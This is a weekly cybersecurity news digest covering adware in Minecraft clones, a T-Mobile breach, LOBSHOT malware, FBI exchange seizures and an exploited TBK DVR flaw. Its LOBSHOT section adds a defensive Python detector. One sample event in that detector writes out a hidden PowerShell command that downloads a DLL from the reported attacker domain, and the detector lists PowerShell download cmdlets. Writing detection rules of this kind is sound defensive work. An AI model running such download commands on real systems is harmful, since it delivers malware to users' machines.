Cyber Weekly Digest - 2023 Week #18
Take a look at this week's Cyber Weekly Digest for a rundown of the latest cyber security news, including the second T-Mobile data breach of the year so far and a new malware campaign being spread through Google Ads. Keep reading to stay up to date on the biggest cyber security news.
1. Android Minecraft clones with 35 million downloads infect users with adware.
A set of 38 Minecraft imitation games on Google Play infected devices with the Android adware "HiddenAds" to stealthily load ads in the background to generate revenue for its operators. Minecraft is a popular sandbox game with 140 million monthly active players, which numerous game publishers have attempted to recreate. The Minecraft-like games hiding adware were downloaded by roughly 35 million Android users worldwide, mainly from the United States, Canada, South Korea, and Brazil. The advertisements are loaded in the background once the user launches the game, but nothing is displayed on the game screen. Network traffic analysis shows the exchange of several questionable packets generated by ad libraries of Google, AppLovin, Unity, and Supersonic, among others. Although adware apps aren't considered dangerous for users, they can still cause performance issues for a mobile device, raise privacy concerns, and even create security loopholes that expose users to nastier infections.
2. T-Mobile discloses a second data breach since the start of 2023, the 8th time to date.
T-Mobile disclosed the second data breach of 2023 after discovering that attackers had access to the personal information of hundreds of customers for more than a month, starting late February 2023. Compared to previous data breaches reported by T-Mobile, the latest of which impacted 37 million people, this incident affected only 836 customers. Still, the amount of exposed information is extensive and exposes affected individuals to identity theft and phishing attacks. "In March 2023, the measures we have in place to alert us to unauthorised activity worked as designed, and we were able to determine that a bad actor gained access to limited information from a small number of T-Mobile accounts between late February and March 2023," the company said in the data breach notification letters sent to affected individuals just before the weekend, on Friday. This is the second such incident this year; the previous one was disclosed on January 19, after attackers stole the personal information of 37 million customers by abusing a vulnerable Application Programming Interface (API) in November 2022. Since 2018, approximately 3% of all T-Mobile customers have had their information exposed in data breaches.
3. "LOBSHOT" malware recently distributed by Google ads with hidden VNC access on Windows.
A new malware known as "LOBSHOT" distributed using Google ads allows threat actors to stealthily take over infected Windows devices using hVNC. Earlier this year, numerous cybersecurity researchers reported a dramatic increase in threat actors utilising Google ads to distribute malware in search results. These advertising campaigns impersonated websites for 7-ZIP, VLC, OBS, Notepad++, CCleaner, TradingView, Rufus, and many more applications. However, these sites pushed malware instead of distributing legitimate applications, including Gozi, RedLine, Vidar, Cobalt Strike, SectoRAT, and Royal Ransomware. A Trojan named LOBSHOT by Elastic Security Labs was discovered to be spreading through Google Ads on a fake AnyDesk remote management software site. This site pushed a malicious MSI file that executed a PowerShell command to download a DLL from download-cdn[.]com, a domain historically associated with the TA505/Clop ransomware gang. Elastic says LOBSHOT deploys an hVNC module that allows the threat actors to control the hidden desktop using their mouse and keyboard as if they were in front of it.
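The MSI-to-PowerShell-to-DLL stage described above is the part of this chain an endpoint team can reasonably alert on. As an added example written for this digest (not Elastic's code or any vendor's detection), the following scans constructed Sysmon-style process-creation events and flags PowerShell spawned by msiexec.exe that also carries a download or DLL indicator; all hosts, paths and command lines are made up, and only the download-cdn[.]com domain comes from the report.

```python
import json
import re

# Constructed sample events (Sysmon Event ID 1 style, one JSON object per line).
# Hosts, paths and command lines are invented; download-cdn.com is the domain
# named in the LOBSHOT report.
SAMPLE_EVENTS = r"""
{"host":"ws01","parent":"C:\\Windows\\System32\\msiexec.exe","image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","cmd":"powershell -w hidden -c (New-Object Net.WebClient).DownloadFile('https://download-cdn.com/x.dll','C:\\Users\\Public\\x.dll')"}
{"host":"ws02","parent":"C:\\Windows\\explorer.exe","image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","cmd":"powershell Invoke-WebRequest https://intranet.example.test/report.csv"}
{"host":"ws03","parent":"C:\\Windows\\System32\\msiexec.exe","image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","cmd":"powershell -ExecutionPolicy Bypass -File C:\\Temp\\setup.ps1"}
{"host":"ws04","parent":"C:\\Windows\\System32\\msiexec.exe","image":"C:\\Windows\\System32\\cmd.exe","cmd":"cmd /c echo done"}
"""

# Common PowerShell download primitives seen in installer-abuse chains.
DOWNLOAD_CMDLETS = re.compile(
    r"DownloadFile|DownloadString|Invoke-WebRequest|\biwr\b|Start-BitsTransfer|\bcurl\b", re.I)
KNOWN_BAD_DOMAINS = {"download-cdn.com"}  # from the LOBSHOT report


def is_powershell(image):
    return image.lower().endswith(("powershell.exe", "pwsh.exe"))


def is_msiexec(image):
    return image.lower().endswith("msiexec.exe")


def evaluate(event):
    """Return the list of reasons an event is suspicious (empty if the chain is absent)."""
    reasons = []
    if not (is_msiexec(event["parent"]) and is_powershell(event["image"])):
        return reasons
    cmd = event["cmd"]
    reasons.append("powershell spawned by msiexec")
    if DOWNLOAD_CMDLETS.search(cmd):
        reasons.append("download cmdlet in command line")
    if re.search(r"\.dll\b", cmd, re.I):
        reasons.append("DLL referenced in command line")
    for domain in KNOWN_BAD_DOMAINS:
        if domain in cmd.lower():
            reasons.append(f"known-bad domain {domain}")
    return reasons


def scan(jsonl):
    """Alert only when the msiexec->PowerShell chain is paired with a payload indicator.
    MSI custom actions legitimately launch PowerShell, so the chain alone is not enough."""
    alerts = []
    for line in jsonl.strip().splitlines():
        event = json.loads(line)
        reasons = evaluate(event)
        if len(reasons) >= 2:
            alerts.append({"host": event["host"], "reasons": reasons})
    return alerts


def scan_sample():
    return scan(SAMPLE_EVENTS)
```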
4. Crypto exchanges used to launder ransomware payments seized by the FBI.
The FBI and Ukrainian police have seized nine cryptocurrency exchange websites that facilitated money laundering for scammers and cybercriminals, including ransomware actors. In its announcement, the FBI says the operation was carried out with the help of the Virtual Currency Response Team, the National Police of Ukraine, and legal prosecutors in the country. The seized websites include 24xbtc.com, 100btc.pro, and owl.gold, among others. When visiting these domains, you will see an official banner from the FBI regarding the site's seizure. These sites allowed users to anonymously convert cryptocurrency into harder-to-trace coins to obscure the money trail and help cybercriminals launder their crypto without being traced by law enforcement. The seized infrastructure can now be used to analyse and unmask cybercriminals who laundered money through the sites, potentially leading to more arrests in the future. Dismantling the sites and services means that law enforcement not only hinders the financial operations of ransomware groups but also sends a strong message to operators of such platforms that illegal activities will not be tolerated.
5. 5-year-old Unpatched Vulnerability in TBK DVR Devices being exploited by hackers.
Adversaries are actively exploiting an unpatched five-year-old flaw impacting TBK digital video recording (DVR) devices, according to an advisory issued by Fortinet FortiGuard Labs. The vulnerability in question is CVE-2018-9995 (CVSS Score: 9.8), a critical authentication bypass issue that remote actors could exploit to gain elevated permissions. "The 5-year-old vulnerability (CVE-2018-9995) is due to an error when handling a maliciously crafted HTTP cookie," Fortinet said in an outbreak alert on May 1, 2023. "A remote attacker may be able to exploit this flaw to bypass authentication and obtain administrative privileges, eventually leading to access to camera video feeds." Fortinet said that it observed over 50,000 attempts to exploit TBK DVR devices using the flaw in April 2023. Despite the availability of a proof-of-concept (PoC) exploit, no fixes address the vulnerability. This flaw could allow a hacker to execute arbitrary code on the device without being authenticated due to the presence of a web shell that is accessible over a /shell URI.